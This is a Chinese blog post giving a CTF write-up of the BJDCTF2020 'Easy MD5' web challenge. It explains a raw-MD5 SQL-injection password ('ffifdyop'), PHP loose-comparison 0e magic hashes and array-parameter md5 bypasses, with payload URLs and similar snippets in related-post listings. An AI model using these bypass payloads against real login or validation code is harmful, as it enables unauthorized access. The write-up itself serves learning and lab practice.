日常练习之web(Easy MD5)

最新推荐文章于 2021-08-29 00:04:02 发布
最新推荐文章于 2021-08-29 00:04:02 发布
阅读量156 收藏
点赞数
分类专栏: web 文章标签: web php
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/doraemon12345/article/details/110142285
版权

打开题目是这样一个界面,猜测可能是注入问题,试了很久无果
在这里插入图片描述查看源码无意间看到hint
在这里插入图片描述

是注入,但是不会,去看大佬wp,发现输入ffifdyop可以绕过,原因是ffifdyop会被解析为16进制276f722736c95d99e921722cf9ed621c,16进制又会被转为ascii,刚好是’or’6,与原句拼接刚好成为一个永真,达到绕过的效果(这里我搜了很多wp都没有很具体解释ffifdyop怎么来的,总之记下就好ffifdyop代表’or’6 以后碰到类似的题可以直接用),绕过之后出现另一个页面
在这里插入图片描述
查看源码

$a = $GET['a'];
$b = $_GET['b'];

if($a != $b && md5($a) == md5($b)){
    // wow, glzjin wants a girl friend.

这属于MD5弱比较,根据PHP代码的原理0e开头的数都是一样的(0e它会认为是科学计数法0的多少次方,0的次方还是0)

QNKCDZO
0e830400451993494058024219903391

s878926199a
0e545993274517709034328855841020

s155964671a
0e342768416822451524974117254469

s214587387a
0e848240448830537924465865611904

s214587387a
0e848240448830537924465865611904

payload=http://e983ea8c-ae5f-4b92-8d5e-f92d88fd04ee.node3.buuoj.cn/levels91.php?a=QNKCDZO&b=s878926199a

弹出下一个页面
在这里插入图片描述这里可以利用数组绕过,因为MD5不能解析数组,所以会返回null,null=null,导致了绕过

param[ ]=QNKCDZO&param2[ ]=s214587387a
在这里插入图片描述拿到flag

south_1
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
MD5.zip_MD5Java_easy _elephantykb
09-21
JAVAMD5加密 很好用的 AVAMD5 encryption is very easy to use
buuctf-web-[BJDCTF2020]Easy MD5-wp
居上
07-23 192
[BJDCTF2020]Easy MD5 知识点 md5 bypass(数组返回false) 过程 主页,是这么个框框 抓包发现提示 select * from 'admin' where password=md5($pass,true) 16 位 md5 常见套路,输入密码 ffifdyop,登录即可。这是因为它的原始字符串导致了' or 1=1 的 SQL 注入,相当于所谓的万能密码登录。请参考: https://www.jianshu.com/p/12125291f50d http://m
RxEasyHttp网络库缓存使用(五)
zhou-you
06-22 835
github源码地址:https://github.com/zhou-you/RxEasyHttp缓存使用缓存介绍本库的缓存主要分okhttp的Cache缓存和自定义的RxCache缓存,大家有疑问okhttp有缓存,retrofit也是支持通过header来设置缓存,为什么还要自定义一个缓存机制呢?通过自定义RxCache缓存使用更简单,更符合我们常用的业务需求(常用的缓存策略也不会太复杂), r
CTFweb题目中的md5弱类型题解
欢迎来到神林的博客
10-09 6067
md5弱比较,为0e开头的会被识别为科学记数法,结果均为0 payload: param1=QNKCDZO&param2=aabg7XSs md5强比较,没有规定字符串如果这个时候传入的是数组不是字符串,md5()函数无法解出其数值并且不会报错,就会得到数值相等; payload: param1[]=111&param2[]=222 真实md5碰...
BUUCTF easy webmd5的问题
qq_44927883的博客
12-03 1469
看了大家的wp,在绕过下面的md5的时候,都是通过两个特殊的值绕过的,但经测后发现不对。 if ((string)$_POST['a'] !== (string)$_POST['b'] && md5($_POST['a']) === md5($_POST['b'])) { echo `$cmd`; } else { echo ("md5 is funny ~"); } 启动本地php跑一下 <?php echo (string)$_GET['a']; echo "
后台登录(实验吧CTF题库-WEB
MyCyber
05-20 3892
后台登录(实验吧CTF题库-WEB) 题目概述 分值:10 难度:易参 解题通过率:94% 格式:flag:{xxx} 题目链接:http://www.shiyanbar.com/ctf/2036 参考解题步骤 1、首先,我们先查看一下网页源码,发现其中有以下注释内容 $password=$_POST['password']; $sql = "SELECT * FROM admin WHERE u...
web_easy_
09-30
This set of skin is modified according to the customer's skin
easy-web-iframe-master.zip
05-07
官网:https://eleadmin.com/
LeetCode_Easy:我的LeetCode日常练习
03-16
LeetCode_Easy 我所做的所有LeetCode问题
批量修改视频MD5
03-16
一键批量修改视频MD5,上传到网盘、视频站的时候规避审核
web刷题记录,查询使用
devil8123665的博客
10-28 2187
1、[RoarCTF 2019]Easy Calchttps://buuoj.cn wp:https://blog.csdn.net/mochu7777777/article/details/109169796 注意点: 使用scandir()函数+chr()函数绕过代码执行 /calc.php?%20num=var_dump(scandir(chr(47))) 或者使用glob()函数 /calc.php?%20num=var_dump(glob(chr(47).chr(42))..
BUUCTF:[BJDCTF2020]Easy MD5
末初的CSDN博客
11-04 336
题目地址:https://buuoj.cn/challenges#[BJDCTF2020]Easy%20MD5 /leveldo4.php 查询,注入?MD5,联想到那个神奇的字符串ffifdyop ffifdyop PS C:\Users\Administrator> php -r "var_dump(md5('ffifdyop'));" string(32) "276f722736c95d99e921722cf9ed621c" PS C:\Users\Administrator>.
[BJDCTF2020] web题-Easy MD5
BROTHERYY的博客
07-09 272
复现环境:buuoj.cn 打开环境得到了提示 百度看了md5($pass,true) 总结: ffifdyop 这个字符串其哈希值:276f722736c95d99e921722cf9ed621c 字符串: ‘or’6 select * from admin where password=’’or’6‘ 相当于万能密码,条件永真。 进入以后查看源代码 数组绕过。原理是md5等函数不能处理数组,导致函数返回Null。而Null是等于Null的,导致了绕过,传入参数a[]=1&b[]=2,进入下
[MRCTF2020] web题-Ez_bypass
BROTHERYY的博客
08-18 335
复现环境:buuoj.cn 开题源码一份 //I put something in F12 for you include 'flag.php'; $flag='MRCTF{xxxxxxxxxxxxxxxxxxxxxxxxx}'; if(isset($_GET['gg'])&&isset($_GET['id'])) { $id=$_GET['id']; $gg=$_GET['gg']; if (md5($id) === md5($gg) && $id
XCTF系列 // Web ez题 Writeup
qq_45805420的博客
07-11 525
1`robots robots 协议也叫 robots.txt 是一种存放于网站根目录下的ASCII编码的文本文件,它用来告知搜索引擎(或网络爬虫)哪些内容能被抓取,哪些内容不能被抓取。因为一些系统中的URL是大小写敏感的,所以 robots.txt 的文件名应统一为小写。   进入本题场景,网页中什么内容也没有,不过没有关系,既然题目为 robots ,故可以先访问 robots.txt 看看。   在该页面可以看到明显的提示,故直接访问 f1ag_1s_h3re.php 页面就可以得到flag。 2`
[SUCTF 2019]EasyWeb
沐目的博客
11-03 5420
https://blog.csdn.net/qq_42181428/article/details/99741920 https://www.cnblogs.com/cimuhuashuimu/p/11546422.html
[CTF]CTF中if (md5(md5($_GET[‘a’])) == md5($_GET[‘b’])) 的绕过
baguangman5501的博客
09-25 7477
原作者:KTWO 出处:https://www.k2zone.cn/?p=2019 0X00 摘要 CTF中md5判等可使用0e绕过,但是如果是双md5该如何绕过呢?本文将教你如何绕过md5(md5($_GET[‘a’])) == md5($_GET[b’])。 0X01 引言 在php中,所有变量都是若类型的,在使用if判等的时候要格外小心,使用特殊的参数可能会使本来不相等的if判断位...
web-MD5加密
qq_31783363的博客
08-20 1329
MD5概述 MD5是一种加密算法。可以用于数据加密、文件快传、文件校验 、数据压缩等方面。 MD5还被称之为数据摘要算法,或数据指纹算法。 a. 特点: i. 经过加密后的数据,是不可破译的,无法得到原有的明文内容。 ii. 经过加密的数据,都是128位2进制数据组成。通常会把它书写成32位16进制数据。 iii. 任何形式的数据,经过加密之后,都会变为二进制数据,长度为32位16进制数据。 ...
BugkuCTF-WEBMD5
am_03的博客
08-29 359
解题流程 打开页面: 根据提示:md5 collision 找一个以0e开头的md5值 0e开头MD5值小结 s878926199a 0e545993274517709034328855841020 s155964671a 0e342768416822451524974117254469 s214587387a 0e848240448830537924465865611904 s214587387a 0e848240448830537924465865611904 s878926199a 0e54599
easy sysprep v5
最新发布
07-30
Easy Sysprep V5 是一款方便使用的系统准备工具。它可以帮助用户轻松地进行系统部署和准备工作。它支持多种操作系统版本,包括 Windows XP、Windows 7、Windows 8、Windows 10 等。 Easy Sysprep V5 具有很多实用...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值